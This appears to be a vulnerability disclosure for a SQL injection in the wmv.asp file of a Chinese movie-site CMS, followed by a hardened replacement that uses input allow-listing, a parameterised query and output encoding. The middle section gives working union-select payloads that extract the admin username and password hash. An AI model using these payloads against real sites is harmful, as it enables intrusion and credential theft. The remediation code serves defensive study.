睛天电影系统 SQL Injection Vulnerability 0day
Author: My5t3ry
Official site: http://www.qingtiandy.cn/
Vulnerable file: /look/template/wmv.asp
Code:
<%
IF Not ChkPost() Then
response.Redirect G_error_page_1
response.End()
End IF
id=replace(request("url"),"'","") ' only strips single quotes
set rs=conn.execute("select top 1 url,id from qingtiandy_movieurl_tudou where id="&id) ' concatenated straight into the SQL
IF rs.Eof Then
response.Redirect G_error_page_1
response.End()
Else
url=rs(0)
End IF
%>
<object classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" name="wmp" width="508" height="415" align="middle" id="wmp">
<param name="url" value="<%=url%>"> <!-- the url column is echoed here -->
<param name="stretchToFit" value="0">
<param name="PlayCount" value="1">
<param name="volume" value="100">
<param name="mute" value="0">
<param name="windowlessVideo" value="0">
<param name="fullScreen" value="0">
</object>
<script language=javascript>
function wmpfull()
{
wmp.fullscreen = "1";
}
document.ondblclick=wmpfull
</script>
Exploit:
javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_username,2 from tbl_admin'>科幻片</a> ");
Open the link that gets written out and view the page source: the admin username appears right after <param name="url" value=".
To read the admin password's MD5 hash:
javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_pass,2 from tbl_admin'>科幻片</a> ");
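A hardened version of the query section of wmv.asp, added here as an illustration and not part of the vendor's code. It assumes the same conn connection object, ChkPost() function and G_error_page_1 variable as the original, and that the id column is an integer (an assumption).

```asp
<%
' Added example: hardened replacement for the top of wmv.asp, not the vendor's code.
' Assumes conn, ChkPost() and G_error_page_1 exist as in the original, and that
' the id column is an integer (assumption).
If Not ChkPost() Then
    Response.Redirect G_error_page_1
    Response.End()
End If

Dim rawId, id, re, cmd, rs, url
rawId = Trim(Request("url"))

' Allow-list the input instead of stripping quotes: only 1 to 10 digits pass,
' so a value such as "-1 union select ..." is rejected before any SQL is built.
Set re = New RegExp
re.Pattern = "^\d{1,10}$"
If Not re.Test(rawId) Then
    Response.Redirect G_error_page_1
    Response.End()
End If
id = CLng(rawId)

' Parameterised query: the value is bound as a typed integer parameter and is
' never concatenated into the statement text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1 ' adCmdText
cmd.CommandText = "select top 1 url,id from qingtiandy_movieurl_tudou where id=?"
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , id) ' adInteger, adParamInput
Set rs = cmd.Execute

If rs.EOF Then
    Response.Redirect G_error_page_1
    Response.End()
Else
    url = rs(0)
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
<!-- Encode the value when echoing it into the attribute, so whatever the row
     holds cannot break out of the param tag. -->
<param name="url" value="<%=Server.HTMLEncode(url)%>">
```

As a defence-in-depth step, the database login the site uses should have read access limited to the movie tables rather than to the admin table, so a future injection elsewhere cannot reach credentials.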
